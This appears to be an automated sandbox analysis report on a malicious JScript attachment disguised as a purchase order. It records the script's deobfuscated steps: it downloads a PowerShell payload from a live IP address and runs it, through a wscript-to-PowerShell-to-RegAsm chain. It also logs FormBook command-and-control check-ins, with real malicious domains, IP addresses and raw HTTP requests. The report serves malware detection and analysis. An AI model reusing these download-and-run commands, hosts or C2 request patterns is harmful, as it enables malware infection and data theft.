                Source: PO from tpc Type 34.1 34,2 35 Spec 1.jsReturn value : ['rwnOBW,1491308fcGHDY,t3bLBG,WRlcQ8k6W7xdJHpcPsxcUcNdMXeWWOJcI8k0WR4lWQpdL3GgbmodgqangCoqBCoGW6pdLINd', '"PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "C:\\Temp\\dddddd.ps1"",0,true', '"WScript.Shell"', '1491308fcGHDY,t3bLBG,WRlcQ8k6W7xdJHpcPsxcUcNdMXeWWOJcI8k0WR4lWQpdL3GgbmodgqangCoqBCoGW6pdLINdP30,omk', '"Scripting.FileSystemObject"', 'WRlcQ8k6W7xdJHpcPsxcUcNdMXeWWOJcI8k0WR4lWQpdL3GgbmodgqangCoqBCoGW6pdLINdP30,omkwWRVcISkCWOO5WQNcJmkY', '"PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "', '"PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ","Ui[L"', 'pSk0WOW,rwnOBW,1491308fcGHDY,t3bLBG,WRlcQ8k6W7xdJHpcPsxcUcNdMXeWWOJcI8k0WR4lWQpdL3GgbmodgqangCoqBCoG', 't3bLBG,WRlcQ8k6W7xdJHpcPsxcUcNdMXeWWOJcI8k0WR4lWQpdL3GgbmodgqangCoqBCoGW6pdLINdP30,omkwWRVcISkCWOO5W']Go to definition
                Source: PO from tpc Type 34.1 34,2 35 Spec 1.jsReturn value : ['rwnOBW,1491308fcGHDY,t3bLBG,WRlcQ8k6W7xdJHpcPsxcUcNdMXeWWOJcI8k0WR4lWQpdL3GgbmodgqangCoqBCoGW6pdLINd', 'k1z+r8oWt8oQ,14fqtxfS,oSkdWR0sW5FdOK9SEd3cJ8oknCkk,PowerShell -NoProfile -ExecutionPolicy RemoteSign', '"PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "C:\\Temp\\dddddd.ps1"",0,true', '"WScript.Shell"', 'omkwWRVcISkCWOO5WQNcJmkYzqm,fapdIre1eYb+sHOIWRlcGW,k1z+r8oWt8oQ,14fqtxfS,oSkdWR0sW5FdOK9SEd3cJ8oknCk', 'PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,v1nJCMLWDc5tAgvSBa,tvnytuWYlLHnteHuvfa,mt', '1491308fcGHDY,t3bLBG,WRlcQ8k6W7xdJHpcPsxcUcNdMXeWWOJcI8k0WR4lWQpdL3GgbmodgqangCoqBCoGW6pdLINdP30,omk', '"Scripting.FileSystemObject"', 'WRlcQ8k6W7xdJHpcPsxcUcNdMXeWWOJcI8k0WR4lWQpdL3GgbmodgqangCoqBCoGW6pdLINdP30,omkwWRVcISkCWOO5WQNcJmkY', '"PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "', '"PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ","Ui[L"', 'pSk0WOW,rwnOBW,1491308fcGHDY,t3bLBG,WRlcQ8k6W7xdJHpcPsxcUcNdMXeWWOJcI8k0WR4lWQpdL3GgbmodgqangCoqBCoG', 't3bLBG,WRlcQ8k6W7xdJHpcPsxcUcNdMXeWWOJcI8k0WR4lWQpdL3GgbmodgqangCoqBCoGW6pdLINdP30,omkwWRVcISkCWOO5W']Go to definition
                Source: PO from tpc Type 34.1 34,2 35 Spec 1.jsReturn value : ['rwnOBW,1491308fcGHDY,t3bLBG,WRlcQ8k6W7xdJHpcPsxcUcNdMXeWWOJcI8k0WR4lWQpdL3GgbmodgqangCoqBCoGW6pdLINd', 'k1z+r8oWt8oQ,14fqtxfS,oSkdWR0sW5FdOK9SEd3cJ8oknCkk,PowerShell -NoProfile -ExecutionPolicy RemoteSign', '"PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "C:\\Temp\\dddddd.ps1"",0,true', '"WScript.Shell"', 'omkwWRVcISkCWOO5WQNcJmkYzqm,fapdIre1eYb+sHOIWRlcGW,k1z+r8oWt8oQ,14fqtxfS,oSkdWR0sW5FdOK9SEd3cJ8oknCk', 'PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,v1nJCMLWDc5tAgvSBa,tvnytuWYlLHnteHuvfa,mt', '1491308fcGHDY,t3bLBG,WRlcQ8k6W7xdJHpcPsxcUcNdMXeWWOJcI8k0WR4lWQpdL3GgbmodgqangCoqBCoGW6pdLINdP30,omk', '"Scripting.FileSystemObject"', 'WRlcQ8k6W7xdJHpcPsxcUcNdMXeWWOJcI8k0WR4lWQpdL3GgbmodgqangCoqBCoGW6pdLINdP30,omkwWRVcISkCWOO5WQNcJmkY', '"PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "', '"PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ","Ui[L"', 'pSk0WOW,rwnOBW,1491308fcGHDY,t3bLBG,WRlcQ8k6W7xdJHpcPsxcUcNdMXeWWOJcI8k0WR4lWQpdL3GgbmodgqangCoqBCoG', 't3bLBG,WRlcQ8k6W7xdJHpcPsxcUcNdMXeWWOJcI8k0WR4lWQpdL3GgbmodgqangCoqBCoGW6pdLINdP30,omkwWRVcISkCWOO5W']Go to definition
                Source: PO from tpc Type 34.1 34,2 35 Spec 1.jsReturn value : ['rwnOBW,1491308fcGHDY,t3bLBG,WRlcQ8k6W7xdJHpcPsxcUcNdMXeWWOJcI8k0WR4lWQpdL3GgbmodgqangCoqBCoGW6pdLINd', 'k1z+r8oWt8oQ,14fqtxfS,oSkdWR0sW5FdOK9SEd3cJ8oknCkk,PowerShell -NoProfile -ExecutionPolicy RemoteSign', '"PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "C:\\Temp\\dddddd.ps1"",0,true', '"WScript.Shell"', 'omkwWRVcISkCWOO5WQNcJmkYzqm,fapdIre1eYb+sHOIWRlcGW,k1z+r8oWt8oQ,14fqtxfS,oSkdWR0sW5FdOK9SEd3cJ8oknCk', 'PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,v1nJCMLWDc5tAgvSBa,tvnytuWYlLHnteHuvfa,mt', '1491308fcGHDY,t3bLBG,WRlcQ8k6W7xdJHpcPsxcUcNdMXeWWOJcI8k0WR4lWQpdL3GgbmodgqangCoqBCoGW6pdLINdP30,omk', '"Scripting.FileSystemObject"', 'WRlcQ8k6W7xdJHpcPsxcUcNdMXeWWOJcI8k0WR4lWQpdL3GgbmodgqangCoqBCoGW6pdLINdP30,omkwWRVcISkCWOO5WQNcJmkY', '"PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "', '"PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ","Ui[L"', 'pSk0WOW,rwnOBW,1491308fcGHDY,t3bLBG,WRlcQ8k6W7xdJHpcPsxcUcNdMXeWWOJcI8k0WR4lWQpdL3GgbmodgqangCoqBCoG', 't3bLBG,WRlcQ8k6W7xdJHpcPsxcUcNdMXeWWOJcI8k0WR4lWQpdL3GgbmodgqangCoqBCoGW6pdLINdP30,omkwWRVcISkCWOO5W']Go to definition
                Source: PO from tpc Type 34.1 34,2 35 Spec 1.jsReturn value : ['rwnOBW,1491308fcGHDY,t3bLBG,WRlcQ8k6W7xdJHpcPsxcUcNdMXeWWOJcI8k0WR4lWQpdL3GgbmodgqangCoqBCoGW6pdLINd', 'k1z+r8oWt8oQ,14fqtxfS,oSkdWR0sW5FdOK9SEd3cJ8oknCkk,PowerShell -NoProfile -ExecutionPolicy RemoteSign', '"PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "C:\\Temp\\dddddd.ps1"",0,true', '"WScript.Shell"', 'omkwWRVcISkCWOO5WQNcJmkYzqm,fapdIre1eYb+sHOIWRlcGW,k1z+r8oWt8oQ,14fqtxfS,oSkdWR0sW5FdOK9SEd3cJ8oknCk', 'PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,v1nJCMLWDc5tAgvSBa,tvnytuWYlLHnteHuvfa,mt', '1491308fcGHDY,t3bLBG,WRlcQ8k6W7xdJHpcPsxcUcNdMXeWWOJcI8k0WR4lWQpdL3GgbmodgqangCoqBCoGW6pdLINdP30,omk', '"Scripting.FileSystemObject"', 'WRlcQ8k6W7xdJHpcPsxcUcNdMXeWWOJcI8k0WR4lWQpdL3GgbmodgqangCoqBCoGW6pdLINdP30,omkwWRVcISkCWOO5WQNcJmkY', '"PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "', '"PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ","Ui[L"', 'pSk0WOW,rwnOBW,1491308fcGHDY,t3bLBG,WRlcQ8k6W7xdJHpcPsxcUcNdMXeWWOJcI8k0WR4lWQpdL3GgbmodgqangCoqBCoG', 't3bLBG,WRlcQ8k6W7xdJHpcPsxcUcNdMXeWWOJcI8k0WR4lWQpdL3GgbmodgqangCoqBCoGW6pdLINdP30,omkwWRVcISkCWOO5W']Go to definition
                Source: PO from tpc Type 34.1 34,2 35 Spec 1.jsReturn value : ['rwnOBW,1491308fcGHDY,t3bLBG,WRlcQ8k6W7xdJHpcPsxcUcNdMXeWWOJcI8k0WR4lWQpdL3GgbmodgqangCoqBCoGW6pdLINd', 'k1z+r8oWt8oQ,14fqtxfS,oSkdWR0sW5FdOK9SEd3cJ8oknCkk,PowerShell -NoProfile -ExecutionPolicy RemoteSign', '"PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "C:\\Temp\\dddddd.ps1"",0,true', '"WScript.Shell"', 'omkwWRVcISkCWOO5WQNcJmkYzqm,fapdIre1eYb+sHOIWRlcGW,k1z+r8oWt8oQ,14fqtxfS,oSkdWR0sW5FdOK9SEd3cJ8oknCk', 'PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,v1nJCMLWDc5tAgvSBa,tvnytuWYlLHnteHuvfa,mt', '1491308fcGHDY,t3bLBG,WRlcQ8k6W7xdJHpcPsxcUcNdMXeWWOJcI8k0WR4lWQpdL3GgbmodgqangCoqBCoGW6pdLINdP30,omk', '"Scripting.FileSystemObject"', 'WRlcQ8k6W7xdJHpcPsxcUcNdMXeWWOJcI8k0WR4lWQpdL3GgbmodgqangCoqBCoGW6pdLINdP30,omkwWRVcISkCWOO5WQNcJmkY', '"PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "', '"PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ","Ui[L"', 'pSk0WOW,rwnOBW,1491308fcGHDY,t3bLBG,WRlcQ8k6W7xdJHpcPsxcUcNdMXeWWOJcI8k0WR4lWQpdL3GgbmodgqangCoqBCoG', 't3bLBG,WRlcQ8k6W7xdJHpcPsxcUcNdMXeWWOJcI8k0WR4lWQpdL3GgbmodgqangCoqBCoGW6pdLINdP30,omkwWRVcISkCWOO5W']Go to definition
                Suspicious execution chain found
                Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeChild: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 4x nop then xor eax, eax10_2_00AC9EF0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 4x nop then mov ebx, 00000004h10_2_048E04E8

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2018856 - Severity 1 - ET MALWARE Windows executable base64 encoded : 196.251.92.64:80 -> 192.168.2.6:49741
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49986 -> 103.106.67.112:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49985 -> 103.106.67.112:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49991 -> 104.21.16.1:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49995 -> 104.21.112.1:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49992 -> 104.21.16.1:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49987 -> 103.106.67.112:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49996 -> 104.21.112.1:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49988 -> 103.106.67.112:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49984 -> 162.218.30.235:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49990 -> 104.21.16.1:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49997 -> 104.21.112.1:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49994 -> 104.21.112.1:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49993 -> 104.21.16.1:80
                System process connects to network (likely due to code injection or exploit)
                Source: C:\Windows\System32\wscript.exeNetwork Connect: 196.251.92.64 80Jump to behavior
                JavaScript source code contains functionality to generate code involving HTTP requests or file downloads
                Source: PO from tpc Type 34.1 34,2 35 Spec 1.jsReturn value : ['"MSXML2.XMLHTTP"']Go to definition
                Source: PO from tpc Type 34.1 34,2 35 Spec 1.jsReturn value : ['"MSXML2.XMLHTTP"']Go to definition
                Source: PO from tpc Type 34.1 34,2 35 Spec 1.jsReturn value : ['"Send"']Go to definition
                Source: PO from tpc Type 34.1 34,2 35 Spec 1.jsReturn value : ['rwnOBW,1491308fcGHDY,t3bLBG,WRlcQ8k6W7xdJHpcPsxcUcNdMXeWWOJcI8k0WR4lWQpdL3GgbmodgqangCoqBCoGW6pdLINd', 'pSk0WOW,rwnOBW,1491308fcGHDY,t3bLBG,WRlcQ8k6W7xdJHpcPsxcUcNdMXeWWOJcI8k0WR4lWQpdL3GgbmodgqangCoqBCoG']Go to definition
                Source: PO from tpc Type 34.1 34,2 35 Spec 1.jsReturn value : ['"MSXML2.XMLHTTP"']Go to definition
                Source: PO from tpc Type 34.1 34,2 35 Spec 1.jsArgument value : ['"http://196.251.92.64/crypt/laser.ps1","C:\\Temp\\dddddd.ps1"']Go to definition
                Source: PO from tpc Type 34.1 34,2 35 Spec 1.jsReturn value : ['"MSXML2.XMLHTTP"', '"Send"']Go to definition
                Source: PO from tpc Type 34.1 34,2 35 Spec 1.jsReturn value : ['rwnOBW,1491308fcGHDY,t3bLBG,WRlcQ8k6W7xdJHpcPsxcUcNdMXeWWOJcI8k0WR4lWQpdL3GgbmodgqangCoqBCoGW6pdLINd', '1491308fcGHDY,t3bLBG,WRlcQ8k6W7xdJHpcPsxcUcNdMXeWWOJcI8k0WR4lWQpdL3GgbmodgqangCoqBCoGW6pdLINdP30,omk', 'WRlcQ8k6W7xdJHpcPsxcUcNdMXeWWOJcI8k0WR4lWQpdL3GgbmodgqangCoqBCoGW6pdLINdP30,omkwWRVcISkCWOO5WQNcJmkY', 'pSk0WOW,rwnOBW,1491308fcGHDY,t3bLBG,WRlcQ8k6W7xdJHpcPsxcUcNdMXeWWOJcI8k0WR4lWQpdL3GgbmodgqangCoqBCoG', 't3bLBG,WRlcQ8k6W7xdJHpcPsxcUcNdMXeWWOJcI8k0WR4lWQpdL3GgbmodgqangCoqBCoGW6pdLINdP30,omkwWRVcISkCWOO5W']Go to definition
                Source: PO from tpc Type 34.1 34,2 35 Spec 1.jsArgument value : ['"http://196.251.92.64/crypt/laser.ps1","C:\\Temp\\dddddd.ps1"']Go to definition
                Source: PO from tpc Type 34.1 34,2 35 Spec 1.jsReturn value : ['"MSXML2.XMLHTTP"', '"Send"']Go to definition
                Source: PO from tpc Type 34.1 34,2 35 Spec 1.jsReturn value : ['"MSXML2.XMLHTTP"']Go to definition
                Source: PO from tpc Type 34.1 34,2 35 Spec 1.jsReturn value : ['"MSXML2.XMLHTTP"', '"Send"']Go to definition
                Source: PO from tpc Type 34.1 34,2 35 Spec 1.jsArgument value : ['"GET","http://196.251.92.64/crypt/laser.ps1",false', '"Send"']Go to definition
                Source: PO from tpc Type 34.1 34,2 35 Spec 1.jsReturn value : ['"MSXML2.XMLHTTP"', '"http://196.251.92.64/crypt/laser.ps1"']Go to definition
                Source: PO from tpc Type 34.1 34,2 35 Spec 1.jsReturn value : ['pSk0WOW,rwnOBW,1491308fcGHDY,t3bLBG,WRlcQ8k6W7xdJHpcPsxcUcNdMXeWWOJcI8k0WR4lWQpdL3GgbmodgqangCoqBCoG']Go to definition
                Source: PO from tpc Type 34.1 34,2 35 Spec 1.jsReturn value : ['"MSXML2.XMLHTTP"']Go to definition
                Source: PO from tpc Type 34.1 34,2 35 Spec 1.jsReturn value : ['k1z+r8oWt8oQ,14fqtxfS,oSkdWR0sW5FdOK9SEd3cJ8oknCkk,PowerShell -NoProfile -ExecutionPolicy RemoteSign', 'omkwWRVcISkCWOO5WQNcJmkYzqm,fapdIre1eYb+sHOIWRlcGW,k1z+r8oWt8oQ,14fqtxfS,oSkdWR0sW5FdOK9SEd3cJ8oknCk', 'PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,v1nJCMLWDc5tAgvSBa,tvnytuWYlLHnteHuvfa,mt', '1491308fcGHDY,t3bLBG,WRlcQ8k6W7xdJHpcPsxcUcNdMXeWWOJcI8k0WR4lWQpdL3GgbmodgqangCoqBCoGW6pdLINdP30,omk', 'WRlcQ8k6W7xdJHpcPsxcUcNdMXeWWOJcI8k0WR4lWQpdL3GgbmodgqangCoqBCoGW6pdLINdP30,omkwWRVcISkCWOO5WQNcJmkY', 'pSk0WOW,rwnOBW,1491308fcGHDY,t3bLBG,WRlcQ8k6W7xdJHpcPsxcUcNdMXeWWOJcI8k0WR4lWQpdL3GgbmodgqangCoqBCoG', 't3bLBG,WRlcQ8k6W7xdJHpcPsxcUcNdMXeWWOJcI8k0WR4lWQpdL3GgbmodgqangCoqBCoGW6pdLINdP30,omkwWRVcISkCWOO5W']Go to definition
                Source: PO from tpc Type 34.1 34,2 35 Spec 1.jsReturn value : ['"Send"']Go to definition
                Source: PO from tpc Type 34.1 34,2 35 Spec 1.jsReturn value : ['pSk0WOW,rwnOBW,1491308fcGHDY,t3bLBG,WRlcQ8k6W7xdJHpcPsxcUcNdMXeWWOJcI8k0WR4lWQpdL3GgbmodgqangCoqBCoG']Go to definition
                Source: PO from tpc Type 34.1 34,2 35 Spec 1.jsReturn value : ['pSk0WOW,rwnOBW,1491308fcGHDY,t3bLBG,WRlcQ8k6W7xdJHpcPsxcUcNdMXeWWOJcI8k0WR4lWQpdL3GgbmodgqangCoqBCoG']Go to definition
                Source: PO from tpc Type 34.1 34,2 35 Spec 1.jsReturn value : ['rwnOBW,1491308fcGHDY,t3bLBG,WRlcQ8k6W7xdJHpcPsxcUcNdMXeWWOJcI8k0WR4lWQpdL3GgbmodgqangCoqBCoGW6pdLINd', '1491308fcGHDY,t3bLBG,WRlcQ8k6W7xdJHpcPsxcUcNdMXeWWOJcI8k0WR4lWQpdL3GgbmodgqangCoqBCoGW6pdLINdP30,omk', 'pSk0WOW,rwnOBW,1491308fcGHDY,t3bLBG,WRlcQ8k6W7xdJHpcPsxcUcNdMXeWWOJcI8k0WR4lWQpdL3GgbmodgqangCoqBCoG']Go to definition
                Source: PO from tpc Type 34.1 34,2 35 Spec 1.jsReturn value : ['"MSXML2.XMLHTTP"']Go to definition
                Performs DNS queries to domains with low reputation
                Source: DNS query: www.l63339.xyz
                Source: DNS query: www.seasay.xyz
                Source: Joe Sandbox ViewIP Address: 103.106.67.112 103.106.67.112
                Source: Joe Sandbox ViewIP Address: 104.21.16.1 104.21.16.1
                Source: Joe Sandbox ViewIP Address: 104.21.16.1 104.21.16.1
                Source: Joe Sandbox ViewASN Name: Web4AfricaZA Web4AfricaZA
                Source: unknownTCP traffic detected without corresponding DNS query: 196.251.92.64
                Source: unknownTCP traffic detected without corresponding DNS query: 196.251.92.64
                Source: unknownTCP traffic detected without corresponding DNS query: 196.251.92.64
                Source: unknownTCP traffic detected without corresponding DNS query: 196.251.92.64
                Source: unknownTCP traffic detected without corresponding DNS query: 196.251.92.64
                Source: unknownTCP traffic detected without corresponding DNS query: 196.251.92.64
                Source: unknownTCP traffic detected without corresponding DNS query: 196.251.92.64
                Source: unknownTCP traffic detected without corresponding DNS query: 196.251.92.64
                Source: unknownTCP traffic detected without corresponding DNS query: 196.251.92.64
                Source: unknownTCP traffic detected without corresponding DNS query: 196.251.92.64
                Source: unknownTCP traffic detected without corresponding DNS query: 196.251.92.64
                Source: unknownTCP traffic detected without corresponding DNS query: 196.251.92.64
                Source: unknownTCP traffic detected without corresponding DNS query: 196.251.92.64
                Source: unknownTCP traffic detected without corresponding DNS query: 196.251.92.64
                Source: unknownTCP traffic detected without corresponding DNS query: 196.251.92.64
                Source: unknownTCP traffic detected without corresponding DNS query: 196.251.92.64
                Source: unknownTCP traffic detected without corresponding DNS query: 196.251.92.64
                Source: unknownTCP traffic detected without corresponding DNS query: 196.251.92.64
                Source: unknownTCP traffic detected without corresponding DNS query: 196.251.92.64
                Source: unknownTCP traffic detected without corresponding DNS query: 196.251.92.64
                Source: unknownTCP traffic detected without corresponding DNS query: 196.251.92.64
                Source: unknownTCP traffic detected without corresponding DNS query: 196.251.92.64
                Source: unknownTCP traffic detected without corresponding DNS query: 196.251.92.64
                Source: unknownTCP traffic detected without corresponding DNS query: 196.251.92.64
                Source: unknownTCP traffic detected without corresponding DNS query: 196.251.92.64
                Source: unknownTCP traffic detected without corresponding DNS query: 196.251.92.64
                Source: unknownTCP traffic detected without corresponding DNS query: 196.251.92.64
                Source: unknownTCP traffic detected without corresponding DNS query: 196.251.92.64
                Source: unknownTCP traffic detected without corresponding DNS query: 196.251.92.64
                Source: unknownTCP traffic detected without corresponding DNS query: 196.251.92.64
                Source: unknownTCP traffic detected without corresponding DNS query: 196.251.92.64
                Source: unknownTCP traffic detected without corresponding DNS query: 196.251.92.64
                Source: unknownTCP traffic detected without corresponding DNS query: 196.251.92.64
                Source: unknownTCP traffic detected without corresponding DNS query: 196.251.92.64
                Source: unknownTCP traffic detected without corresponding DNS query: 196.251.92.64
                Source: unknownTCP traffic detected without corresponding DNS query: 196.251.92.64
                Source: unknownTCP traffic detected without corresponding DNS query: 196.251.92.64
                Source: unknownTCP traffic detected without corresponding DNS query: 196.251.92.64
                Source: unknownTCP traffic detected without corresponding DNS query: 196.251.92.64
                Source: unknownTCP traffic detected without corresponding DNS query: 196.251.92.64
                Source: unknownTCP traffic detected without corresponding DNS query: 196.251.92.64
                Source: unknownTCP traffic detected without corresponding DNS query: 196.251.92.64
                Source: unknownTCP traffic detected without corresponding DNS query: 196.251.92.64
                Source: unknownTCP traffic detected without corresponding DNS query: 196.251.92.64
                Source: unknownTCP traffic detected without corresponding DNS query: 196.251.92.64
                Source: unknownTCP traffic detected without corresponding DNS query: 196.251.92.64
                Source: unknownTCP traffic detected without corresponding DNS query: 196.251.92.64
                Source: unknownTCP traffic detected without corresponding DNS query: 196.251.92.64
                Source: unknownTCP traffic detected without corresponding DNS query: 196.251.92.64
                Source: unknownTCP traffic detected without corresponding DNS query: 196.251.92.64
                Source: global trafficHTTP traffic detected: GET /crypt/laser.ps1 HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 196.251.92.64Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /vhr7/?cf2hYv=iaSfD1StI7hDT4qIAMii2AJAHOe0qHDn7gYmLjmbAGxKTACTDmsoqhtbBCAt1Ym3ncJClzXtgr7Snspij9c4s0uX0JFKsYq7jFvEkjnfDBmxL2FKNTn2vhsZCjIw0EPfzx7R5kM=&WHYh=mJr4VrfpGDBp HTTP/1.1Host: www.l63339.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0(iPad; U; CPU OS 8_1.1 like Mac OS X; en-us) AppleWebKit/533.17.8 (KHTML, like Gecko) Version/5.0.6 Mobile/8F191 Safari/6534.18.5
                Source: global trafficHTTP traffic detected: GET /c9ts/?cf2hYv=b2h4705j/BXuiRKtB3JtAMBCvYzPFBfMqHSZnAN25/qy/QtrNwJS7WfSSjTsExAyaJnRUVMUOnSQnGJ4mxt7QzE7wP7HHXABn4vnPr4KbIzP7onr4No6wwmVIVHMDZ1g/WEU5TU=&WHYh=mJr4VrfpGDBp HTTP/1.1Host: www.seasay.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0(iPad; U; CPU OS 8_1.1 like Mac OS X; en-us) AppleWebKit/533.17.8 (KHTML, like Gecko) Version/5.0.6 Mobile/8F191 Safari/6534.18.5
                Source: global trafficHTTP traffic detected: GET /k566/?WHYh=mJr4VrfpGDBp&cf2hYv=RARW43WNMKajmHoYlEtIRJLMiezSzeuXvXreCHJ6fEp5jkldk9mcWmm/U2k918FOdcoJ/x5nnQwLxIae2MHe+MwTnQBeuAzsSoj839zvz1sEY8eOyaRRELHSv6n+5nuEPWCNCpw= HTTP/1.1Host: www.tumbetgirislinki.fitAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0(iPad; U; CPU OS 8_1.1 like Mac OS X; en-us) AppleWebKit/533.17.8 (KHTML, like Gecko) Version/5.0.6 Mobile/8F191 Safari/6534.18.5
                Source: global trafficHTTP traffic detected: GET /jgkl/?cf2hYv=hI+cEEoDMRK5HtHlz4V8IEOzbfVROUzo+nuR9x41ri89hVkyLZ4bVRvwmPB4YpqMZl4/b+D+8qc7dcfD2Dlpa+lylzXZBDngtVYDkWplwhs1JNVM9/WuG0QosQeZid/o9jeqLeg=&WHYh=mJr4VrfpGDBp HTTP/1.1Host: www.lucynoel6465.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0(iPad; U; CPU OS 8_1.1 like Mac OS X; en-us) AppleWebKit/533.17.8 (KHTML, like Gecko) Version/5.0.6 Mobile/8F191 Safari/6534.18.5
                Source: global trafficDNS traffic detected: DNS query: www.l63339.xyz
                Source: global trafficDNS traffic detected: DNS query: www.seasay.xyz
                Source: global trafficDNS traffic detected: DNS query: www.tumbetgirislinki.fit
                Source: global trafficDNS traffic detected: DNS query: www.lucynoel6465.shop
                Source: unknownHTTP traffic detected: POST /c9ts/ HTTP/1.1Host: www.seasay.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateOrigin: http://www.seasay.xyzReferer: http://www.seasay.xyz/c9ts/Content-Length: 211Cache-Control: no-cacheConnection: closeContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0(iPad; U; CPU OS 8_1.1 like Mac OS X; en-us) AppleWebKit/533.17.8 (KHTML, like Gecko) Version/5.0.6 Mobile/8F191 Safari/6534.18.5Data Raw: 63 66 32 68 59 76 3d 57 30 4a 59 34 44 6c 67 38 7a 6d 57 35 46 36 57 58 32 78 58 4d 50 49 78 69 4a 75 36 49 52 48 59 6e 55 4c 6b 7a 41 74 66 75 65 4b 75 72 51 35 70 50 52 74 73 32 58 79 46 63 6c 75 6f 49 52 59 54 59 4b 44 4b 54 43 74 31 59 32 2f 49 30 47 63 49 70 45 34 70 57 54 45 55 36 4b 7a 67 50 58 5a 69 6f 64 6d 78 4c 71 6f 66 58 49 2b 4c 37 36 62 4b 35 66 52 48 31 69 32 65 45 32 57 75 44 59 42 30 36 32 51 56 2f 32 4d 73 62 32 48 6b 75 32 32 5a 47 36 32 51 35 4f 2b 50 30 55 43 61 74 4b 43 4f 31 4d 37 4b 64 32 39 67 73 41 36 2f 37 5a 63 48 7a 7a 59 47 53 30 39 63 4f 4a 54 6a 47 78 4a 32 4e 48 58 31 6b 7a 2b 2b 6a 48 5a 6a Data Ascii: cf2hYv=W0JY4Dlg8zmW5F6WX2xXMPIxiJu6IRHYnULkzAtfueKurQ5pPRts2XyFcluoIRYTYKDKTCt1Y2/I0GcIpE4pWTEU6KzgPXZiodmxLqofXI+L76bK5fRH1i2eE2WuDYB062QV/2Msb2Hku22ZG62Q5O+P0UCatKCO1M7Kd29gsA6/7ZcHzzYGS09cOJTjGxJ2NHX1kz++jHZj
